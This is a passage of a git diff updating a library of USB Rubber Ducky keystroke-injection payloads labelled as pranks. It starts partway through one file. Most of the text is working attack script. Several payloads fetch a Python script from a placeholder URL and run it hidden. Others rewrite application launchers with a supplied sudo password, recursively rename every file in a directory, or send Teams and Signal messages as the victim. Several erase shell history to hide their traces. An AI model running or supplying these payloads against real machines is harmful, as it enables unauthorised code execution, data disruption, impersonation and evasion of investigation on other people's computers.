REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
STRINGLN powershell
DELAY 2000
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 2000
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden

79
payloads/library/prank/ChangeDesktopWallpaper_LinuxKDE/payload.txt
View File

@ -1,39 +1,58 @@
REM ###########################################
REM # |
REM # Title : Change Desktop Wallpaper |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Linux (KDE based) |
REM # |
REM ###########################################
REM_BLOCK
###########################################
# #
# Title : Change Desktop Wallpaper #
# Author : Aleff #
# Version : 1.1 #
# Category : Prank #
# Target : Linux (KDE based) #
# #
###########################################
REM Requirements:
REM - Internet Connection
Requirements:
- Internet Connection
END_REM
REM Replace 'example.com/IMAGE_NAME' with your image link
DEFINE #IMAGE_LINK example.com/IMAGE_NAME
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
DEFINE #IMAGE_PATH="file://example.jpg"
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
DELAY 1000
CTRL-ALT t
DELAY 2000
REM Replace 'example.com/IMAGE_NAME' with your image link
DEFINE IMAGE_LINK example.com/IMAGE_NAME
STRING wget
STRING IMAGE_LINK
ENTER
REM Replace example.jpg with the image path, for example /home/USERNAME/example.jpg
DEFINE IMAGE_PATH="file://example.jpg"
STRINGLN wget #IMAGE_LINK
REM It depends by the Internet Connection
DELAY 2000
STRING qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", "
STRING IMAGE_PATH
STRING ")}'
ENTER
DELAY 1000
STRING rm -rf
STRING IMAGE_PATH
STRING ;history -c; exit;
ENTER
STRINGLN qdbus org.kde.plasmashell /PlasmaShell org.kde.PlasmaShell.evaluateScript 'var allDesktops = desktops();for (i=0;i<allDesktops.length;i++) {d = allDesktops[i]; d.wallpaperPlugin = "org.kde.image";d.currentConfigGroup = Array("Wallpaper", "org.kde.image", "General");d.writeConfig("Image", "#IMAGE_PATH")}'; rm -rf #IMAGE_PATH;history -c; exit;

77
payloads/library/prank/Change_The_App_That_Will_Be_Runned/payload.txt
View File

@ -1,46 +1,65 @@
REM #######################################################
REM # |
REM # Title : Change The App That Will Be Runned |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : GNU/Linux (Debian based tested) |
REM # |
REM #######################################################
REM Requirements:
REM - sudo permissions
REM_BLOCK
#######################################################
# #
# Title : Change The App That Will Be Runned #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : GNU/Linux (Debian based tested) #
# #
#######################################################
Requirements:
- sudo permissions
END_REM
REM You must know the original desktop name file, if you don't know it you can rich this information download the app on you system and going to /usr/share/applications/ searching this one app, i.e. the desktop file name of Signal application is signal-desktop.desktop, so in this case you should put signal-desktop.desktop
DEFINE ORIGINAL_DESKTOP_FILE_NAME_1 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_1 example
DEFINE ORIGINAL_DESKTOP_FILE_NAME_2 example
DEFINE ORIGINAL_DESKTOP_EXEC_COMMAND_2 example
DEFINE #ORIGINAL_DESKTOP_FILE_NAME_1 example
DEFINE #ORIGINAL_DESKTOP_EXEC_COMMAND_1 example
DEFINE #ORIGINAL_DESKTOP_FILE_NAME_2 example
DEFINE #ORIGINAL_DESKTOP_EXEC_COMMAND_2 example
REM sudo permissions needed
DEFINE SUDO example
DEFINE #SUDO example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Open a shell
DELAY 2000
CTRL-ALT t
DELAY 1000
STRING sudo sed -i '/^Exec=/s/.*/
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_2
STRING /'
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_1
STRINGLN sudo sed -i '/^Exec=/s/.*/ #ORIGINAL_DESKTOP_EXEC_COMMAND_2 /' #ORIGINAL_DESKTOP_FILE_NAME_1
DELAY 500
STRING SUDO
ENTER
STRINGLN #SUDO
DELAY 4000
STRING sudo sed -i '/^Exec=/s/.*/
STRING ORIGINAL_DESKTOP_EXEC_COMMAND_1
STRING /'
STRINGLN ORIGINAL_DESKTOP_FILE_NAME_2
STRINGLN sudo sed -i '/^Exec=/s/.*/#ORIGINAL_DESKTOP_EXEC_COMMAND_1/' #ORIGINAL_DESKTOP_FILE_NAME_2
DELAY 1000
ALT f4

75
payloads/library/prank/Continuos Print In Terminal/payload.txt
View File

@ -1,27 +1,68 @@
REM ####################################################
REM # |
REM # Title : Continuos Print In Terminal |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10/11 |
REM # |
REM ####################################################
REM_BLOCK
####################################################
# #
# Title : Continuos Print In Terminal #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11 #
# #
####################################################
Plug And Play <3
REM Plug And Play <3
Requirements:
- Internet Connection
- ExecutionPolicy Bypass
- Python
END_REM
REM Requirements:
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 2000
STRINGLN (New-Object -ComObject WScript.Shell).SendKeys("{F11}")

83
payloads/library/prank/Full-ScreenBannerJoke/payload.txt
View File

@ -1,36 +1,73 @@
REM ############################################
REM # |
REM # Title : Full-Screen Banner Joke |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ############################################
REM_BLOCK
############################################
# #
# Title : Full-Screen Banner Joke #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10-11 #
# #
############################################
REM Requirements:
REM - Internet Connection
REM - Python installed
REM - ExecutionPolicy Bypass
Requirements:
- Internet Connection
- Python installed
- ExecutionPolicy Bypass
END_REM
REM REQUIRED - Set your Python script link
DEFINE SCRIPT-PY-LINK example.com
DEFINE #SCRIPT-PY-LINK example.com
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 500
STRING powershell
ENTER
STRINGLN powershell
DELAY 500
STRING Invoke-WebRequest -Uri "
STRING SCRIPT-PY-LINK
STRING " -OutFile "script.py"
ENTER
STRINGLN Invoke-WebRequest -Uri "#SCRIPT-PY-LINK" -OutFile "script.py"
DELAY 500
STRINGLN Start-Process python.exe -ArgumentList "script.py" -WindowStyle Hidden

81
payloads/library/prank/PlayASongThroughSpotify_Windows/payload.txt
View File

@ -1,29 +1,69 @@
REM ##################################################
REM # |
REM # Title : Play A Song Through Spotify |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ##################################################
REM Requirements:
REM - Internet Connection
REM - Spotify installed and user logged-in
REM - ExecutionPolicy Bypass
REM_BLOCK
##################################################
# #
# Title : Play A Song Through Spotify #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10-11 #
# #
##################################################
Requirements:
- Internet Connection
- Spotify installed and user logged-in
- ExecutionPolicy Bypass
END_REM
REM REQUIRED - Set your song name
DEFINE SONG-NAME example
DEFINE #SONG-NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
STRINGLN powershell
DELAY 2000
STRINGLN Start-Process "spotify://"
@ -43,8 +83,7 @@ REM Some times popups of advertisements may come out and usually they will click
REM ESCAPE
REM DELAY 500
STRING SONG-NAME
ENTER
STRINGLN #SONG-NAME
DELAY 1000
TAB
DELAY 500

26
payloads/library/prank/Prank_In_The_Middle_Thunderbird/payload.txt
View File

@ -1,12 +1,14 @@
REM #####################################################
REM # #
REM # Title : Prank In The Middle - Thunderbird #
REM # Author : Aleff #
REM # Version : 1.0 #
REM # Category : Prank #
REM # Target : Windows 10/11 #
REM # #
REM #####################################################
REM_BLOCK
#####################################################
# #
# Title : Prank In The Middle - Thunderbird #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11 #
# #
#####################################################
END_REM
EXTENSION DETECT_READY
REM VERSION 1.1
@ -38,8 +40,7 @@ END_EXTENSION
REM Open Thunderbird and goto settings
GUI r
STRING thunderbird
ENTER
STRINGLN thunderbird
DELAY 1000
REPEAT 4 TAB
ENTER
@ -70,8 +71,7 @@ DELAY 500
REM Open the powershell and goto the directory
GUI r
STRING powershell
ENTER
STRINGLN powershell
DELAY 1500
STRING cd
DELAY 500

118
payloads/library/prank/Same_File_Name_Prank/README.md Normal file
View File

@ -0,0 +1,118 @@
# Same File Name Prank
This script, titled **Rename Everything Similarly**, is written in **DuckyScript 3.0** and designed to rename files and directories recursively on **Windows** or **GNU/Linux** systems, depending on the target environment. The script renames directories and files within a specified directory, giving them sequential and similar names.
Specifically, the ability to add a blank space to the end of the name is used. On Windows systems, if file extension viewing is not enabled the names will look identical to the human eye, while on GNU/Linux systems the difference may be more easily noticed.
![No extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/1.png?raw=true)
> How does renaming files using spaces without seeing the extension appear on windows. - To the human eye they look identical.
![With extensions](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/2.png?raw=true)
> What it looks like instead if you turn on the extension view.
# Index
1. [Features](#features)
2. [Payload Structure](#payload-structure)
- [Conditional Target OS Execution](#conditional-target-os-execution)
- [PowerShell (Windows)](#powershell-windows)
- [Bash (GNU/Linux)](#bash-gnulinux)
3. [How to Use](#how-to-use)
4. [Why not MacOS?](#why-not-macos)
5. [Notes](#notes)
6. [Credits](#credits)
## Features
- **Cross-platform support**: The script can be executed on either **Windows** or **GNU/Linux** systems, based on the defined conditions, unfortunately it could not be published for macOS as well, [read more](#why-not-macos).
- **Recursive renaming**: It renames all directories and files inside a given directory, iterating through subdirectories.
- **Customizable**: Users can modify the base directory path and rename pattern as needed.
## Payload Structure
### Conditional Target OS Execution
The script detects (*from the DEFINE*) the target OS and adapts to either **Windows** or **GNU/Linux**:
- If the target system is **Windows**, the script will execute a PowerShell script.
- If the target system is **Linux**, it will execute a Bash script.
### PowerShell (Windows)
For **Windows** systems, the script:
- Opens **PowerShell** and runs the `Rename-Directories` and `Rename-Files` functions.
- It renames directories by assigning sequential names like `d`, `dd`, etc., and files with names like `a`, `a `, `a `, followed by their respective file extensions.
### Bash (GNU/Linux)
For **GNU/Linux** systems, the script:
- Opens a terminal and executes two Bash functions: `rename_directories` and `rename_files`.
- It performs similar renaming of directories and files, using `mv` to rename them with sequential names (like `d`, `dd`, etc... or `a`, `a `, `a ` etc...).
## How to Use
1. **Edit Definitions (*not mandatory, Windows by default*)**: Adjust the following definitions in the script according to your environment:
- `DEFINE #TARGET_WINDOWS TRUE`: Leave **#TARGET_WINDOWS** to **TRUE** if the script will run on a Windows system.
- `DEFINE #TARGET_GNU_LINUX FALSE`: Set **TARGET_LINUX** to **TRUE** if the script will run on a GNU/Linux system.
- Ufortunately it could not be published for macOS as well, [read more](#why-not-macos).
- `#DIRECTORY_WHERE_TO_RUN_THE_COMMAND`: Specify the base directory where the renaming operation should occur, the default is `.` so the default route of Powershell and Bash.
Consider that the main route for Windows generally is `C:\Users\Username\` while for GNU/Linux systems it is something like `/home/username/` but in both cases if for istance you add `./Desktop/Hello/World/` you will go to the World folder in the path `C:\Users\Username\Desktop\Hello\World\` for Windows systems and `/home/username/Desktop/Hello/World/`.
Of course, you have to make sure that this folder exists....
![Windows command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/3.png?raw=true)
> How Windows response to the command `cd ./Desktop/Hello/World/`
![Ubuntu command](https://github.com/aleff-github/Deposito/blob/main/Rename_Everything_Similarly/4.png?raw=true)
> How Ubuntu response to the command `cd ./Desktop/Hello/World/`
Consider the maximum length of file names on both Windows and GNU/Linux:
- [Limit on file name length in bash \[closed\]](https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash)
|=> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
- [On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)](https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap)
|=> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
2. **Load Payload**: Upload the script to a USB Rubber Ducky device using the **DuckEncoder**.
3. **Execute Payload**: Insert the USB Rubber Ducky into the target machine.
## Why not MacOS?
I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
If I could know the behavior of this script on macOS (*which probably remains completely unchanged from use on GNU/Linux systems*) it could be optimized in that it could be reduced to a **WINDOWS_PASSIVE_DETECT** where if it is not Windows (*so generally GNU/Linux or macOS systems*) the bash script may be fine.
## Notes
- Ensure that the specified directories exist on the target machine.
- Use with caution on sensitive systems, as the renaming process is recursive and may affect large directories.
- Contributions to add support for macOS are welcome.
## Credits
<h2 align="center"> Aleff :octocat: </h2>
<div align=center>
<table>
<tr>
<td align="center" width="96">
<a href="https://github.com/aleff-github">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/github.png?raw=true width="48" height="48" />
</a>
<br>Github
</td>
<td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a>
<br>Linkedin
</td>
</tr>
</table>
</div>

222
payloads/library/prank/Same_File_Name_Prank/payload.txt Normal file
View File

@ -0,0 +1,222 @@
REM_BLOCK
#############################################
# #
# Title : Same File Name Prank #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10/11; GNU/Linux #
# #
#############################################
END_REM
REM I am very sorry not to be able to release scripts for macOS systems as well but unfortunately not having one would be too risky to test it in a VM, at least in my opinion, so if someone from the community wants to contribute they could propose a pull request with the macOS version so that we can integrate it and make this payload cross-platfom.
REM %%%%% DEFINE-SECTION %%%%%
REM_BLOCK
Consider that the main route for Windows generally is “C:\Users\Username\” while for GNU/Linux systems it is something like “/home/username/” but in both cases if for example you add “./Desktop/Hello/World/” you will go to the World folder in the path “C:\Users\Username\Desktop\Hello\World\” for Windows systems and “/home/username/Desktop/Hello/World/” for **GNU/Linux** systems.
Of course, you have to make sure that this folder exists....
Payload Settings:
#DIRECTORY_WHERE_TO_RUN_THE_COMMAND - If you feel it is appropriate to run this script within a specific folder you will just need to change this definition.
Consider the maximum length of file names on both Windows and GNU/Linux:
- Limit on file name length in bash [closed]
|-> https://stackoverflow.com/questions/6571435/limit-on-file-name-length-in-bash
- On Windows, what is the maximum file name length considered acceptable for an app to output? (Updated and clarified)
|-> https://stackoverflow.com/questions/8674796/on-windows-what-is-the-maximum-file-name-length-considered-acceptable-for-an-ap
END_REM
DEFINE #DIRECTORY_WHERE_TO_RUN_THE_COMMAND .
REM Set TARGET_WINDOWS to TRUE if the script will run on a Windows system.
REM Set TARGET_LINUX to TRUE if the script will run on a GNU/Linux system.
DEFINE #TARGET_WINDOWS TRUE
DEFINE #TARGET_GNU_LINUX FALSE
REM %%%%% PAYLOAD-SECTION %%%%%
IF (( #TARGET_WINDOWS == TRUE) && (#TARGET_GNU_LINUX == FALSE)) THEN
REM %%%%% WINDOWS CODE %%%%%
REM_BLOCK
Credits: Hak5 LLC
Website: https://hak5.org/
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
END_REM
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r
DELAY 1000
STRINGLN PowerShell
DELAY 1000
STRINGLN_POWERSHELL
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
function Rename-Directories {
param (
[string]$path,
[ref]$counter
)
$folders = Get-ChildItem -Path $path -Directory -Recurse | Sort-Object FullName -Descending
foreach ($folder in $folders) {
$newFolderName = "d" * $counter.Value # Crea il nuovo nome della cartella
$newFolderPath = $newFolderName
$counter.Value++
Rename-Item -Path $folder.FullName -NewName $newFolderPath
Write-Host "Rinominata cartella: $($folder.FullName) -> $($newFolderPath)"
}
}
function Rename-Files {
param (
[string]$path,
[ref]$counter
)
$files = Get-ChildItem -Path $path -File -Recurse
foreach ($file in $files) {
$newFileName = "a" + " " * $counter.Value # Crea il nuovo nome del file
$newFilePath = "$newFileName" + $file.Extension
$counter.Value++
Rename-Item -Path $file.FullName -NewName $newFilePath
}
}
$counter = 1; Rename-Directories -path $basePath -counter ([ref]$counter); $counter = 1; Rename-Files -path $basePath -counter ([ref]$counter); Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
END_STRINGLN
ELSE IF (( #TARGET_WINDOWS == FALSE) && (#TARGET_GNU_LINUX == TRUE)) THEN
REM %%%%% GNU/LINUX CODE %%%%%
REM_BLOCK
Credits: Hak5 LLC
Website: https://hak5.org/
Source: https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/detect_ready.txt
END_REM
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t
DELAY 1000
STRINGLN_BASH
cd #DIRECTORY_WHERE_TO_RUN_THE_COMMAND
rename_directories() {
local path=$1
local counter=$2
directories=$(find "$path" -type d | sort -r)
for dir in $directories; do
new_folder_name=$(printf 'd%.0s' $(seq 1 "$counter")) # Crea il nuovo nome della cartella
new_folder_path="$path/$new_folder_name"
counter=$((counter + 1))
mv "$dir" "$new_folder_path"
done
}
rename_files() {
local path=$1
local counter=$2
files=$(find "$path" -type f)
for file in $files; do
extension="${file##*.}"
new_file_name="a$(printf ' %.0s' $(seq 1 "$counter"))"
new_file_path="$(dirname "$file")/$new_file_name"
if [[ "$extension" != "$file" ]]; then
new_file_path="$new_file_path.$extension"
fi
counter=$((counter + 1))
mv "$file" "$new_file_path"
done
}
counter=1; rename_directories "$base_path" $counter; counter=1; rename_files "$base_path" $counter; rm $HISTFILE; exit
END_STRINGLN
END_IF

107
payloads/library/prank/SendMessagesInTeams/payload.txt
View File

@ -1,37 +1,82 @@
REM ###########################################
REM # |
REM # Title : Send Messages In Teams |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank |
REM # Target : Windows 10-11 |
REM # |
REM ###########################################
REM_BLOCK
###########################################
# #
# Title : Send Messages In Teams #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank #
# Target : Windows 10-11 #
# #
###########################################
REM Requirements:
REM - Microsoft Teams installed and user logged-in
REM - Internet Connection
REM - ExecutionPolicy Bypass
REM - Python
Requirements:
- Microsoft Teams installed and user logged-in
- Internet Connection
- ExecutionPolicy Bypass
- Python
REM 1. Open a powershell
REM 2. Close if Teams is opens and reopen it
REM 3. Goto search bar
REM 4. Search the person by name, email, id or what you want...
REM 5. Downarrow and enter to open the chat
1. Open a powershell
2. Close if Teams is opens and reopen it
3. Goto search bar
4. Search the person by name, email, id or what you want...
5. Downarrow and enter to open the chat
END_REM
REM REQUIRED - Name, email, id or what you want for contact the target
DEFINE USER-ID example
REM REQUIRED - Messages
DEFINE MESSAGE1 example
REM ...
REM DEFINE MESSAGEN example..
DEFINE #USER-ID example
REM REQUIRED - Messages
DEFINE #MESSAGE1 example
REM ...
REM DEFINE #MESSAGEN example..
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 1000
GUI r
DELAY 1000
STRING powershell
ENTER
STRINGLN powershell
DELAY 2000
REM #### Powershell ####
@ -44,8 +89,7 @@ DELAY 10000
REM #### Teams ####
CTRL N
DELAY 2000
STRING USER-ID
ENTER
STRINGLN #USER-ID
DELAY 2000
TAB
DELAY 1000
@ -53,11 +97,10 @@ TAB
DELAY 1000
REM #### Messages ####
STRING MESSAGE1
ENTER
STRINGLN #MESSAGE1
DELAY 1000
REM ...
REM STRINGLN MESSAGEN
REM STRINGLN #MESSAGEN
DELAY 500
ALT F4

91
payloads/library/prank/SendSignalMessages/payload.txt
View File

@ -1,41 +1,83 @@
REM #########################################
REM # |
REM # Title : Send Signal Messages |
REM # Author : Aleff |
REM # Version : 1.0 |
REM # Category : Prank, Execution |
REM # Target : Windows 10-11 |
REM # |
REM #########################################
REM_BLOCK
#########################################
# #
# Title : Send Signal Messages #
# Author : Aleff #
# Version : 1.0 #
# Category : Prank, Execution #
# Target : Windows 10-11 #
# #
#########################################
REM Requirements:
REM - Internet Connection
REM - Signal App installed
REM Payload Plug-And-Play but can be edited as you want the message
Requirements:
- Internet Connection
- Signal App installed
Payload Plug-And-Play but can be edited as you want the message
END_REM
REM REQUIRED - Receiver number
DEFINE NUMBER 3332211000
DEFINE #NUMBER 3332211000
REM REQUIRED - Message to send
DEFINE MESSAGE YOUR_MESSAGE
DEFINE #MESSAGE example
